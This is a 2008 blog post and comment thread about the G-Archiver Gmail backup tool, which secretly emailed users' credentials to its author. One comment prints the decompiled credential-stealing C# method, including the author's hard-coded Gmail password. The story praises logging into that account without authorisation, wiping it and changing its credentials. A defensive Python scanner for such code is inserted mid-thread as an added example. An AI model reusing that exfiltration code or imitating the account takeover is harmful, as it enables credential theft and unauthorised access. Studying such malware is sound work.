A Question of Programming Ethics

March 7, 2008

From the ACM Code of Ethics:

As an ACM member I will
  1. Contribute to society and human well-being.
  2. Avoid harm to others.
  3. Be honest and trustworthy.
  4. Be fair and take action not to discriminate.
  5. Honor property rights including copyrights and patent.
  6. Give proper credit for intellectual property.
  7. Respect the privacy of others.
  8. Honor confidentiality.

It's hard to square that with the following hair-raising tale Dustin Brooks sent me via email:

I was looking for a way to back up my gmail account to a local drive. I've accumulated a mass of important information that I would rather not lose. During my search I came across G-Archiver, I figured what the heck I'll give it a try.

It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code. What I came across was quite shocking. John Terry, the apparent creator, hard-coded his username and password to his gmail account in source code. All right, not the smartest thing in the world to do, but then I noticed that every time a user adds their account to the program to back up their data, it sends an email with their username and password to his personal email box! Having just entered my own information I became concerned.

I opened up a browser and logged in to gmail using his account information. It still worked.

[Screenshot: Gmail password thief]

Upon getting to the inbox I was greeted with 1,777 emails with account information for everyone who had ever used the software and right at the top was mine. I decided to go ahead and blast every email to the deleted folder and then empty it. I may have accidentally changed the password and security question to something I don't remember as well, whoops, my bad. I also contacted google to erase this account as I didn't see a way to delete it myself.

I generally try to give people the benefit of the doubt, but it's difficult to imagine any scenario where this isn't a completely malicious violation of people's trust. This is every user's greatest fear when giving out their login credentials, and to see it realized hurts the trust relationship between users and every other professional programmer working today. I've inadvertently posted my own login information to this very blog before. Fortunately for me, an eagle-eyed reader by the name of Israel Orange didn't abuse that information for his own gain, but instead kindly pointed out my error to me in a private email.

I certainly hope there are more programmers out there like Israel Orange than John Terry. Ethics matter for programmers, too.

Posted by Jeff Atwood

I had a guy email me his Credit Report once in Electronic Form. He frantically emailed me and asked me to delete it, which I did. I called him and he was so happy that he sent me an Amazon.com giftcard for $25. I have had people email me their e-tickets for their flights, etc.

Brian W on March 7, 2008 2:40 AM

That's really bad, and the problem is that only people like us (who know what Reflector is) realize that kind of thing, and very often the law falls short of punishing these kinds of crimes.

Good job, Jeff! If you stop programming, try to be a detective or a TV series writer.

I really enjoy your blog, thanks!

Raúl Martínez on March 7, 2008 2:41 AM

Goes to show how much you can trust websites which request your email user/pass to import contacts!

Mithun on March 7, 2008 2:43 AM

Trust is good, possibility to check is better. If anything, this story is the best warning against closed source software.

BTW, why is this software still linked to?

Nikolai on March 7, 2008 3:08 AM

Funny, a lot of people seem to be praising Jeff's honesty. Although I'm sure Jeff is honest, the hero of the story is John Terry, as Jeff himself clearly points out. Not sure where this misunderstanding is coming from.

mwalts on March 7, 2008 3:19 AM

Actually, mwalts, it's Dustin Brooks who is the curious programmer who figured this out. Though I don't know why Jeff doesn't link to the original source.

KyleG on March 7, 2008 3:23 AM

Actually John Terry is the antagonist in this story and Dustin Brooks, the protagonist, deserves all the praise.

Robert Kozak on March 7, 2008 3:23 AM

"Trust but verify."

R. Reagan on March 7, 2008 3:25 AM

KyleG, I agree, I love Jeff's blog but sometimes I wish he would link better to the original source. If in this case it was sent to him privately in an email, he should at least point that out.

Robert Kozak on March 7, 2008 3:25 AM

Surely the *real* hero is Dustin Brooks? John Terry is the villain of the tale.

Confused on March 7, 2008 3:27 AM

Good will, but poor action:

"John Terry" had probably set up email forwarding to a backup gmail account in case somebody decompiled his code.

So he still has all the passwords.

So now, with everything deleted and the account password modified, how are we going to notify all these accounts that they should change their password?

Fabien on March 7, 2008 3:30 AM

That's why I don't download programs from those shareware directories.

Check out the site of the g-archiver "author": http://www.matemediainc.com

Looks like a spammy SEO site. Not surprised. There's probably a lot of shareware out there like this, because most of the time the guys pulling scams like this are script kiddies who are trading "recipes" on private forums.

engtech on March 7, 2008 3:30 AM

It's great to see somebody talking about ethics in relation to programming. So often I think it's easy to get caught up in an idea of "I'm just interacting with a machine, and it interacts with other machines, and I'm not responsible for anything...".

It's also unfortunate that there really are people out there who would violate those ethics, but it's good to see that they are real--that's something that does have to be confronted.

I think point 1 in that ACM code is also something to think about. I wonder how many people are working on software that really does not contribute to human well-being, and don't think about it. It's an unfortunate tradition, though--some of the first computers ever were used to aim missiles, and without some twisty logic it's hard to say how that contributes to human well-being more than other things the same programmer could have spent their time doing.

-Max

Max Kanat-Alexander on March 7, 2008 3:31 AM

"Actually, mwalts, it's Dustin Brooks who is the curious programmer who figured this out. Though I don't know why Jeff doesn't link to the original source."

I'm pretty sure this IS the original source. There are no other references to Dustin Brooks / John Terry / G-Archiver that I can find on the web.

Jeff's usually really awesome about linking to sources.

engtech on March 7, 2008 3:33 AM

You stopped FAR too short. This should be turned over to authorities. That must be some sort of CRIMINAL offense.

uhura on March 7, 2008 3:34 AM

Wow. How incredible. I think this is a wake-up call... we shouldn't automatically trust software.

Alan Hogan on March 7, 2008 3:35 AM

You logged into my gmail account? And deleted the fruits of my hard work? Some people have no shame!

(sorry, couldn't resist. -- My name is Thomas, not J Terry)

jterry79 on March 7, 2008 3:41 AM

mwalts: Dustin Brooks is the hero, not John Terry. John Terry is the inept coder.

leetdood on March 7, 2008 3:43 AM

This John Terry seems to email pawel lesnikowski and adityasonphavde (aditya rao). I would not trust these people either.

joe on March 7, 2008 3:51 AM

This sort of problem is what OAuth is designed to help solve.

Not only can 3rd party websites not truly be trusted with one's passwords, now that all computers are pretty much online all the time, it's not safe to trust closed source apps, or even open source apps with uninspected code, with one's password.

Mark Atwood on March 7, 2008 3:54 AM

First of all, Dustin Brooks for president. What a hero.

Next, note that matemedia.com (alleged publisher of this tool) has at least two telephone numbers:
1-877-309-7521
1-877-752-1309
(first via http://www.russmate.com/client_support.php, second via whois)

Dustin Brooks' sense of humor seems to be at least equal to his sense of justice. I want Mr. Brooks to call "John Terry" and explain the situation. In fact, if he recorded the call and placed the MP3 on a lame shareware site I would probably even pay $29.95 to listen.

PWills on March 7, 2008 4:04 AM

That's fishy. Why would jterry need to include his u/p in the program? As a diabolical villain, I don't think he'd make the cut to be on 24. I mean, this isn't like an IRC bot where you have to put the hostname to phone home to into the bot... He could have sent email to his account without exposing the password!

Is he really that dense, or is this some kind of weird hoax?

One thing is true -- if you DL the program and use reflector, you do indeed see the facts as they are described in this post:

// Decompiled from the Mail class in SM.dll. The parameters a and b are the
// username and password the user just typed in to back up their own account.
public static void CheckConnection(string a, string b)
{
    try
    {
        MailMessage message = new MailMessage();
        // Addressed to the author's own mailbox, not to the user.
        message.To.Add("JTerry79@gmail.com");
        message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
        message.Subject = "Account";
        message.SubjectEncoding = Encoding.UTF8;
        // The user's credentials become the body of the message.
        message.Body = "Username: " + a;
        message.Body = message.Body + "\r\nPassword: " + b;
        message.BodyEncoding = Encoding.UTF8;
        message.IsBodyHtml = false;
        message.Priority = MailPriority.High;
        SmtpClient client = new SmtpClient();
        // The author's own Gmail credentials, hard-coded in the assembly.
        client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
        client.Port = 0x24b; // 587, the SMTP submission port
        client.Host = "smtp.gmail.com";
        client.EnableSsl = true;
        client.Send(message);
    }
    catch (Exception)
    {
        // Any failure is swallowed, so the user never sees that a message was sent.
    }
}

Patrick on March 7, 2008 4:08 AM

Very interesting Jeff. Btw, here in British Columbia, Canada, Software Engineers can be registered as Professional Engineers that adhere to this code of ethics:
http://www.apeg.bc.ca/resource/publications/actbylawscode.html

Interestingly enough, as a professional software engineer, you can be held legally responsible for the designs and codes you write. I wonder what our profession (vocation? craft?) would look like if we were all held legally responsible for our work?

Mitch Barnett on March 7, 2008 4:09 AM

Patrick wrote:
That's fishy. Why would jterry need to include his u/p in the program?

Because GMail requires authentication to use their SMTP server.

Matt on March 7, 2008 4:15 AM

Why would anyone pay $30 to get a backup copy of their GMail account when Thunderbird is free? Just connect to GMail's IMAP server, set TB to save all downloaded messages, and do a complete sync. Not only would you then have a complete backup, but you would also be able to read and send email from TB while having it synced with GMail.

Just about any other mail client with IMAP support should also work.

Daniel E. Renfer on March 7, 2008 4:15 AM

Jeff's usually really awesome about linking to sources.

Thank you, I do try very very hard to link all the sources I talk about. The original is from an email; I added some text to the post to clarify this and put Dustin's name in bold.

And yes, Dustin is the hero here, not me. I'm just reporting it.

Jeff Atwood on March 7, 2008 4:16 AM

Look everyone, I don't mean to be bursting everyone's bubble, but I'm not finding this in the source code anywhere. While this is my first time using Reflector, I'm not an idiot and I have searched through all the source code Reflector produces and there is no reference to an email address "jterry79@gmail.com".

Now maybe the software has been updated and the malicious code has been removed, or maybe someone is crying wolf. I would love for someone to reference something specific other than "hey look what I found."

Ryan on March 7, 2008 4:16 AM

Ryan wrote:
I'm not finding this in the source code anywhere

The CheckConnection method is in the SM.dll Mail class. It is not in the EXE.

Patrick copy / pasted the code accurately.

Matt on March 7, 2008 4:19 AM

My apologies everyone. Looks like I am an idiot.

Ryan on March 7, 2008 4:22 AM

What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I'm just curious as to where you would draw the line.

Travis on March 7, 2008 4:28 AM

This was truly malicious behavior, but (as Jeff has pointed out in previous posts) users do not understand how accessible their identity can be:

I recently recovered a PC from a municipal recycling center. While evaluating its value for parts I discovered it was completely functional. The HDD still had the OS, Outlook, and several years of Turbo Tax on it. Everything was live. I didn't have the nerve to call the guy and tell him how stupid he was, but I was kind enough to bomb the machine to bedrock before reconditioning it. My son now happily surfs PBS on it. Not a bad exchange for a $20 electronics recycling charge and a dead TV.

There are times when I really pity the great unwashed user contingent, and at the same time am grateful that most geeks are non-belligerent.

Rick Cabral on March 7, 2008 4:30 AM

Wow! That's all I can say. I wonder how many gmail accounts he's harvested. Like someone said, maybe this should be reported to the police. Since google accounts can be linked to financial information (via google checkout), this could be considered theft.

Bart on March 7, 2008 4:55 AM

Jeff,

Great detective work.

I don't know if you've ever covered this, but I would think that just asking a user for username and password and email address on a website would probably net someone a certain percentage of people who would for simplicity sake just use the same username and password everywhere (thereby giving you their username and password to email, or who knows what).

Tom Monroe on March 7, 2008 4:57 AM

In response to Travis, some engineers reportedly quit the company that makes the space shuttle's robotic arm, because of a proposed takeover by a U.S. arms maker.

Chris L on March 7, 2008 5:21 AM

What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I'm just curious as to where you would draw the line.

That's always been the big problem. It's not unique to computer science at all. One could say it started with the physicists "knowing sin" but in reality you can trace it back a lot farther.

But in reality the people taking a paycheck always find a way to justify it to themselves. Oh, they're not the ones harming others -- that's what the military does, what politicians do. Oh, they're not the ones not contributing to society -- they just make the tools. Same old story.

Shmork on March 7, 2008 5:43 AM

My oh my, that is horrible! It goes to show how much seemingly legitimate software we install that could be malicious, and how much trust we place in the authors.

This time round you had the source code, what about apps that we don't?

Ryan Allen on March 7, 2008 6:32 AM

Yeah, it's bad, but come on, use your common sense - there is no such thing as free software. Someone gets something out of it, it might not be money it might be data. Never use shareware - here is the answer.

PaulZ on March 7, 2008 7:06 AM

You don't have to try to justify it. Like it or not, there is evil in the world and people have a moral obligation to protect themselves and their families.

Some of us take that seriously, while others live behind that protection and point fingers about how bad it is.

Oh, and before I worked for a DoD contractor I worked on medical software that was responsible for helping to bring new lives into this world that might not make it.

With either job, I know I am making a difference in the world and sleeping just fine at night. I doubt if I would feel the same working on a new search engine or game or accounting package.

Oogie Pringle on March 7, 2008 7:08 AM

Didn't Dustin email all the affected users to warn them to change their passwords?

Jeremy on March 7, 2008 7:18 AM

I have a problem with 4 in conjunction with 5. Often I find a lot that is unfair in our current copyright law and fairness. (Example: the RIAA has changed its tune and claims it is illegal to rip a CD you purchased for your computer or MP3 player.)

In order to behave in a fair way, I should be allowed to break copyright. But then, I'd be breaking copyright.

gex on March 7, 2008 7:40 AM

I'm no fan of professional soccer, but a quick search or two on some of the (non-victim) names from the screenshot appear to be related to it (John Terry of Chelsea, Pawel, and Lesnikowski). Maybe the dickwad responsible for this douchebaggery (thanks Jeff for expanding my vocabulary) is a fan.

Brian on March 7, 2008 7:44 AM

Fortunately for me, an eagle-eyed reader by the name of Israel Orange didn't abuse that information for his own gain, but instead kindly pointed out my error to me in a private email.

Is this why you chose the word "orange" for the post security word? Interesting choice. :)

Nice post Jeff.

Patrick on March 7, 2008 8:06 AM

Rule: wherever you give your passwords you should/must be cautious.

Nikos on March 7, 2008 8:08 AM

The ACM also has a similar document called Software Engineering Code of Ethics and Professional Practice which has more practical and tangible aspirations. These aren't just rules for ACM members, they prescribe a code of conduct for all software engineers.

http://www.acm.org/about/se-code#full

Of these, John Terry has violated these:

3.12. Work to develop software and related documents that respect the privacy of those who will be affected by that software.

3.13. Be careful to use only accurate data derived by ethical and lawful means, and use it only in ways properly authorized.

Ken Liu on March 7, 2008 8:32 AM

And that, my friends, truly is coding horror.

John Walker on March 7, 2008 8:37 AM

Hi Jeff,

I don't normally post but I thought I should make an exception for this topic.

I completely agree that this is a horrible betrayal of trust. I find this offensive to the honest programmers out there for whom this has negative effects. It's scumbags like this guy that make people question every file, live in fear of scams, and contribute to fear of technology.

I really enjoy your blog, thanks for sharing this.

Kyle on March 7, 2008 8:38 AM

To give John Terry the benefit of the doubt, there is always the possibility that this was some kind of development (debugging) version that had somehow become publicly available.

A. Nony Mouse on March 7, 2008 8:38 AM

http://www.matemediasoft.com/

These guys are also selling programs for MySpace and YouTube (FriendTools and TubeAdder) that require your login/password.

And here's the kicker: they're both spamming tools.

"Add thousands of new friends to your network quickly. Great tool for those who want to market to myspace users."
"This easy to use software also automates the process of adding comments on YouTube. If you plan on marketing on YouTube, you need this tool."

Kapow on March 7, 2008 9:08 AM

That russmate.com/matemedia.com site rang a bell - I knew I'd seen it somewhere before. Recently. Amid many LOLs.

And yes indeed - MateMedia turned out to be the company hosting a scammy "Federal suppliers directory" site which gave Alex Papadimoulis of The Daily WTF a chance to run a most excellent story all his own:
http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
(Do NOT miss the spectacular flameout by company staff in the comments!)

Man, 2008's really shaping up to be their year, isn't it?

Daniel Rutter on March 7, 2008 9:27 AM

This is really a big threat for open source or freeware developers. Users won't trust developers anymore who are working hard to provide something useful.

Sahil Saggar on March 7, 2008 10:22 AM

Why didn't Mr. Brooks just use an old-fashioned Perl script for archiving?

Sharma on March 7, 2008 10:25 AM

Terrible!
And Ryan, the info is still there: it is in the Mail class in the SM.dll file, not in the main exe.

trial blazer on March 7, 2008 10:43 AM

I don't normally post, but I wanted to comment on those who are saying that programming in some way for the military violates 1 and 2 of the code above. As Oogie Pringle said, there are people in the world who are malicious, and it is important to defend against them.

Maybe this could be seen as an unfortunate prisoner's dilemma, but in no way does it reflect poorly on the ethical or moral sense of the people doing the programming.

DKH on March 7, 2008 10:54 AM

Please elaborate more on Reflector.

Author/website perhaps? Thanks.

Phil

Phil on March 7, 2008 10:58 AM

@Phil:

Lutz Roeder's .NET Reflector: http://www.aisto.com/roeder/dotnet/

Excellent tool.

We use Lutz as a verb. "Let's lutz it and find out"

David Dawkins on March 7, 2008 11:33 AM

@Domenic - please stop programming, right now.

Ciaran on March 8, 2008 1:09 AM

Dave asked, "Were his [Dustin Brooks] actions /really/ any more "ethical" than John Terry's?"

To which the answer is a resounding "yes."

Ben Poole on March 8, 2008 1:11 AM

@stewie

Go on and live in your little world where everything would be just fine if there were no guns or missiles. I'm sure that before that everyone lived in peace and harmony, right? Of course, all you have to do is look at North America BEFORE 1492 and that goes right out the door.

And don't worry. People like me will continue to defend people like you so you can live in your safe little world.

Oogie

Oogie Pringle on March 8, 2008 1:43 AM

Domenic,
you would like to use an encrypted appSettings element in your app.config then.
http://msdn2.microsoft.com/en-us/library/ms998280.aspx

Alexander Groß on March 8, 2008 1:51 AM

Domenic, security by obscurity has never been a solution. You don't embed sensitive credentials in code. Period.

Encrypting the data means you have a key somewhere. Writing your own cryptographic algorithm means it's broken (see Schneier) and anyway, all that's needed to break your clever encrypted-password-in-executable scheme is to set up a software http/https proxy (fiddler, wireshark, etc.) and read the plain text credentials passed by the program.

Never rely on native code obfuscation for security.

Yann Schwartz on March 8, 2008 1:56 AM
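Yann's point is a code-review one: a literal sender credential, a literal recipient and a password written into a message body are exactly what the decompiled CheckConnection listing earlier in the thread shows. The following scanner is an added example (not code from the post, from Patrick, or from G-Archiver) that flags those shapes in decompiled C# source; the sample inputs are constructed, with the real address and password replaced by placeholders.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the shape of the decompiled CheckConnection method
# quoted earlier in the thread, with the real address and password replaced by
# placeholders. The method mails the user-supplied username (a) and password (b)
# to a fixed mailbox using credentials baked into the assembly.
SUSPICIOUS_SOURCE = r'''
public static void CheckConnection(string a, string b)
{
    try
    {
        MailMessage message = new MailMessage();
        message.To.Add("author@example.com");
        message.From = new MailAddress("author@example.com", "Author", Encoding.UTF8);
        message.Subject = "Account";
        message.Body = "Username: " + a;
        message.Body = message.Body + "\r\nPassword: " + b;
        SmtpClient client = new SmtpClient();
        client.Credentials = new NetworkCredential("author@example.com", "placeholder-secret");
        client.Port = 0x24b;
        client.Host = "smtp.gmail.com";
        client.EnableSsl = true;
        client.Send(message);
    }
    catch (Exception)
    {
    }
}
'''

# Constructed benign counterpart: recipient and credentials come from
# configuration and the current user's context; nothing is baked in.
BENIGN_SOURCE = r'''
public static void SendReport(string body)
{
    SmtpClient client = new SmtpClient();
    client.Credentials = CredentialCache.DefaultNetworkCredentials;
    client.Host = Settings.SmtpHost;
    MailMessage message = new MailMessage();
    message.To.Add(Settings.ReportRecipient);
    message.Body = body;
    client.Send(message);
}
'''


@dataclass(frozen=True)
class Finding:
    line: int
    rule: str
    detail: str


# Each rule is a regex over the whole source text; group 1, when present,
# is the value worth showing to the reviewer.
RULES = (
    # Both NetworkCredential arguments are string literals: an account baked in.
    ("hardcoded-credential",
     re.compile(r'new\s+NetworkCredential\s*\(\s*"([^"]*)"\s*,\s*"([^"]*)"')),
    # The mail recipient is a literal address rather than configured or user-chosen.
    ("hardcoded-recipient",
     re.compile(r'\.To\.Add\s*\(\s*"([^"]+@[^"]+)"')),
    # A message body assembled from a literal that mentions a password.
    ("secret-in-message-body",
     re.compile(r'\.Body\s*=.*"[^"]*[Pp]assword[^"]*"')),
    # An empty catch block: the send can neither be noticed nor fail visibly.
    ("silent-catch",
     re.compile(r'catch\s*\([^)]*\)\s*\{\s*\}')),
)


def scan_source(text: str) -> list[Finding]:
    """Return every rule hit in the source, ordered by line number."""
    findings = []
    for rule, pattern in RULES:
        for m in pattern.finditer(text):
            line = text.count("\n", 0, m.start()) + 1
            detail = m.group(1) if m.groups() else m.group(0).split("\n")[0]
            findings.append(Finding(line, rule, detail))
    return sorted(findings, key=lambda f: (f.line, f.rule))


def looks_like_credential_exfiltration(findings: list[Finding]) -> bool:
    """Literal sender credentials, a literal recipient and a password in the body
    together are the shape of the G-Archiver method, not of ordinary mail code."""
    hit = {f.rule for f in findings}
    return {"hardcoded-credential", "hardcoded-recipient", "secret-in-message-body"} <= hit


if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_SOURCE), ("benign", BENIGN_SOURCE)):
        found = scan_source(src)
        print(f"{name}: {len(found)} finding(s), "
              f"exfiltration pattern: {looks_like_credential_exfiltration(found)}")
        for f in found:
            print(f"  line {f.line:>2}  {f.rule:<24} {f.detail}")
```

Run against Reflector output for any assembly that asks for a password, the same rules turn "hey look what I found" into specific line references a reviewer can check.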

HAH! I was *not* expecting my name to pop up when I started reading this post :-) BTW, Jeff sent me some awesome Coding Horror stickers for my trouble.

Patrick-I can't take credit for Jeff's choice of CAPTCHA-it was around a long time before I ever spoke to him.

Israel Orange on March 8, 2008 1:57 AM

Cool ... it's OK to *steal* a log-in and password from source code, illegally log in to the email account and destroy all the messages [and the account had the perp figured out how] -because- you guys didn't like what the vendor was doing.

You haven't the foggiest fricking idea what he was /actually/ doing with any of that information - but your assumption that he was up to no good gives you the warm and fuzzy you need do what ever the hell you want. Bah ... I call BS!

Please don't confuse /any/ of this with any misguided perception that I condone what originally happened - I'm appalled -but- that doesn't give you the right ...

the doctrine of double-effect
Horse hockey!

Both events [provided the first one is /actually/ illegal] should be punishable by law.

Have a pleasant day,

Dave on March 8, 2008 2:28 AM

That's why I don't trust shareware. They can leave you with a bunch of spyware and steal your personal information. The only software that I can trust is free (as in freedom) software.

Keitare on March 8, 2008 2:51 AM

Curious thought. The email address may have been embedded in the code and done what you say, but the snapshot of the inbox shows that ALL of those passwords and email addresses were NEW and UNREAD.

Although it was a completely dumbass way of going about things, I would probably deduce that the email account was set up to capture those for the lost passwords and account names for those who use the program or something equally idiotic. In no way am I saying this is the right thing to do, but the programmer was more than likely extremely foolish, but mostly oblivious to the trust he was violating.

On the other hand, the gentleman you say had alerted google of this, violates someone else's inbox, using someone else's information that required a bit of digging to get, trashes this other party's email account, and sends a note marking it for deletion.

This is ALSO a vast breech of proper ethics.
The first thing to do would be to alert the programmer of this error, and request that it is dealt with in an ethical manner that alerts his users of this "programming error" and then re-releases with a better password storage option, if any at all.

If this fails to get any attention, then report it to the proper authorities or agency for dealing with this issue, as well as google.

Your friend may be in some hot water for his actions as well.

The Postindustrialist on March 8, 2008 3:09 AM

Another reason NOT to reveal your password in software.

nymphetamine on March 8, 2008 3:33 AM

Good thing you changed the password to the account. So is John Terry walking scot-free? I believe he has some explaining to do.

gogole on March 8, 2008 4:22 AM

Holy Living Funk! What a huge scam, I'm going to every shareware download site that will let me post a review of this and link to this article, great job! Really love your blog, everyday reader for a few months now.

jeremy on March 8, 2008 4:50 AM

Orange? I'm typing in orange, and you wrote about John Orange. Heh.

EVERYONE SHOULD USE OPENID TO AVOID THIS CRAP :)

Greg Magarshak on March 8, 2008 4:55 AM

Even after all this, John Terry still has less information about his victims than your average Google employee.

Geri on March 8, 2008 4:59 AM

IN GENERAL

if A does something illegal
and person B does something illegal to uncover it

B's evidence should be admissible in court
and both A and B should be tried for the crimes they committed.

In our current society, though, police may uncover crucial evidence without a warrant but it will be inadmissible in court. I think it is much more fair for the evidence to still be admissible in court AND for the officer to be tried for the crime of breaking and entering. If they want to risk a few years in jail to put a violent criminal behind bars, they should have the ability to do so.

Greg

Greg Magarshak on March 8, 2008 4:59 AM

[quote=dave]This is appalling. I'm really glad you wrote the article.

Given that, there's not a word here about the ethics of Dustin Brooks having;
1) using Reflector to take a peek at the source code that wasn't his,
2) opening up a browser and logging in to gmail that wasn't his using the found account information,
3) deciding to go ahead and blast every email to the deleted folder and then empty it on an account that wasn't his,
4) changing the password and security question on an account that wasn't his, and
5) contacting google to erase this account only after he didn't see a way to delete it himself.

I thought the topic here was Ethics [albeit Programming Ethics]?

To my way of thinking all he had the right to do was contact google and report the incident.

Were his actions /really/ any more "ethical" than John Terry's?
[/quote]

There is certainly an opportunity for academic debate on the ethics exhibited by Misters Brooks and Terry, but I know where I stand within that debate. Your view struck me right away, upon reading this article, but truthfully (non-violent) vigilante justice is consistent with my personal ethics, so I don't see a conflict here. Especially when it comes down to this kind of rarely prosecuted, yet extremely harmful crime. Mr. Brooks, we are to presume, would never log into someone's account maliciously. He was simply protecting himself, and others. Mr. Terry had no right to that information to begin with, I see no foul play in preventing him from accessing it, and forcing him to contact google... or sign up for another account, of course. I believe Mr. Brooks to be a hero without doubt.

jeremy on March 8, 2008 5:01 AM

Why do people act so shocked? If you download any app or go to any website which asks for you credentials to do *anything* you should be extremely cautious and only trust once you've verified that it is legit. You might argue that there was no way to verify it in this case without reflecting it and looking at what it was doing, but your credentials are basically your children when you're roaming the 'net - so if you can't verify it, DON'T USE IT. It's pretty simple. And for the person who said this guy was probably smart enough to create a back-up account "in case someone reflected his code"... no, he would have obfuscated the code if he was being cautious. He f'ed up.

I assume most of you would trust, say, Facebook to keep its word and *not* store your credentials when you allow it to use its "Friend Finder"? Why?

And it's frankly a waste of time to say this is a matter of ethics and we all need to be held to a higher standard and "if only he adhered to the code" etc. Sorry, the 'net is the real world, it's not contained within our individual computers. People are out to scam, and you need to go out there believing it. As honest programmers we need to stick together, and the scammers will make themselves known. That's the real value of Jeff's post.

SpongeJim on March 8, 2008 5:20 AM

Thank you Dustin Brooks for erasing the credentials. I was not on the list but you definitely made the world a better place. Also thanks for exposing the phisher and trojan malware author.

To those who say he did not do the right thing: There is NO excuse for harvesting passwords. Even if "John Terry" is merely a total moron it's inexcusable, and I'm not buying it; stealing users' passwords is done for ill gain.

I probably wouldn't do exactly as Brooks, such as I'd log in through Tor, get shocked like him, change the password, make sure there was no forwarding, notify all users by sending them a warning together with their respective account passwords to make sure they understand it's real, then not delete anything but get the attention of the police. But I'm in no place to complain as I wouldn't have refractored it in the first place. Again, he certainly did the best he could think of, it seems he probably did neuter it, and he made the details about the trojan public. Very good job.

Anonymous on March 8, 2008 5:33 AM

"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did."

Actually, Dustin did miss one step. Mass emailing everyone involved to let them know what happened.

It's trivial for someone with your gmail user/password to set up a backdoor using email forwarding so that they'll get copies of any email with "password" in it or billing information.

Hell, all they have to do is change your "secondary password recovery email address" as well and they'll be able to hijack your account whenever they want to. I had this happen to me when the domain name for my password recovery email address got sold: http://internetducttape.com/2007/10/31/password-recovery-online-security/

engtech on March 8, 2008 5:33 AM

What if this article had been about Brooks getting caught in the email account where all he found was personal mail? There's little if anything to indicate that it was any more than a crap shoot (with pretty big odds in his favor admittedly) that he would.

Although he did state: 'I noticed that every time a user adds their account to the program to back up their data, it sends and email with their username and password to his personal email box.'
Wonder how he noticed that about 'other' users.

In addition the comment: 'It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code.' - doesn't cause any alarms here, amazing. How would having a peek improve the functionality of the program?

Have your big hug-fest because a data farmer was snagged. What he did to get there, IMHO, was wrong. I won't bother arguing the issue any further, we seem to differ on opinion in this regard ... which is ok by me. It's all just the perspective I saw/read it from at any rate.

Dave on March 8, 2008 5:44 AM

"What if this article had been about Brooks getting caught in the email account where all he found was personal mail?"

In this case perhaps he'd send the account an email suggesting "Terry" should change his password. And again, he would have helped someone.

"In addition the comment: 'It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code.' - doesn't cause any alarms here, amazing. How would having a peek improve the functionality of the program?"

That's one of the ways malware is identified. It's really hard to turn it around against him, especially when we know what he did.

Anonymous on March 8, 2008 5:54 AM

*uses my handy-dandy CSI black-stripe decryptor to get the passwords from your image*

Anonymous on March 8, 2008 6:17 AM

Shouldn't you be putting a "nofollow" on the G-Archiver link?

Pádraig Brady on March 8, 2008 7:12 AM

Actually, Ral, U.S. law is very specific as to this particular issue. Have a look at the Federal Wiretap Act, 18 U.S.C. 2510 (http://www.cybercrime.gov/wiretap2510_2522.htm)

Joshua Auriemma on March 8, 2008 7:21 AM

So, just to be a little contrarian, can anyone point out in the code of ethics where it says that programmers should become vigilantes? It would seem to me that Dustin Brooks falls short of living up to the ideal of honoring property rights. By deleting the GMail account and the emails therein, Dustin has potentially opened himself up to prosecution under laws designed to be used against hackers. In addition he has potentially destroyed evidence that might be used to prosecute John Terry.

If he really wanted to be a good guy he could have just reported the individual to Google's security hotline along with the appropriate documentation, as well as reporting to the shareware site where the application was hosted.

Joe Brinkman on March 8, 2008 7:28 AM

Travis,
What if you like killing people? Your choices are limited in that case: join the military (if you can) and get paid to do what you enjoy, work for a weapons development company and get paid more, or commit a "crime". It's all about perspective and whether you're working freelance or as an employee :).

Justin on March 8, 2008 7:31 AM

You did download it directly from the developer's site? Or purchase it?

There is the possibility that you downloaded a hacked version. Although it seems unlikely the gmail account would be similar to the developer's name... a less lame scammer would send to a mail server that wouldn't provide access using same password or be traceable back to him.

If you purchased it and/or didn't accept a use at your own risk license it's hard to imagine a crime or civil liability doesn't exist.

curmudgeonly troll on March 8, 2008 7:39 AM

@Joe:

If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did. Stopping the leak should be first priority, then catching the guy. The chances of the latter, and successfully prosecuting him/her, are unfortunately slim anyway.

A. L. Flanagan on March 8, 2008 7:46 AM

One point about trusting "free" software: there's a big difference between this sort of program and open source projects, where you (and everyone) can see the actual source code. This couldn't have happened if someone knowledgeable had been able to even glance at the source.

A. L. Flanagan on March 8, 2008 7:48 AM

Dave wrote "You haven't the foggiest fricking idea what he was /actually/ doing with any of that information"

It doesn't matter what he was doing with it. Just collecting it without informing users that he was collecting it is either a breach of privacy laws and/or fraud.

Of course, if you don't think so, I have this new remote login application I'd like you to try. It doesn't email the IP, username, and password/SSH certificate used to me or anything!

Powerlord on March 8, 2008 7:48 AM

I was going to respond telling John Terry how he could have avoided this situation, but I decided to apply the Code of Ethics and not do so. Hopefully I made the world a better place today.

modern women suck on March 8, 2008 8:05 AM

Shameless proselytising...

This is one reason that users should be entitled to examine the source code, or otherwise reverse engineer/analyse the workings of a piece of software, without fear of legal backlash.

There is an ethical imperative here that overrides any economic rebuttal.

Justin Megawarne on March 8, 2008 8:12 AM

@Oogie Pringle
That's the problem with this world, people like you. You are all about self preservation and the preservation of those close to you. The fact is that if we considered those around us who we don't know as equal in worth to ourselves we would think twice before working on weapons and devices that we know will kill others. Just because you justify it by saying that there are evil people in the world does not absolve you from the fact that you are a contributing factor to that person's death. More innocent people die today as a result of the direct work that we do. This is no longer the days of open war when enemies met in a field and attacked each other and you knew that pretty much anybody who was there had decided to give their life for that cause. Now we have more innocent people dying than combatants. So you have to ask yourself when you write that code for the guidance chip that goes in the missile: but for the fact that I and my colleagues chose to write this code, would xxxxx be dead? I know you sleep well at night because you think you are protecting your family, and that is the truly tragic part about this. I know some will make the argument that anything can be a weapon, you don't know how it is going to be used, well can you honestly say that?

stewie on March 8, 2008 8:13 AM

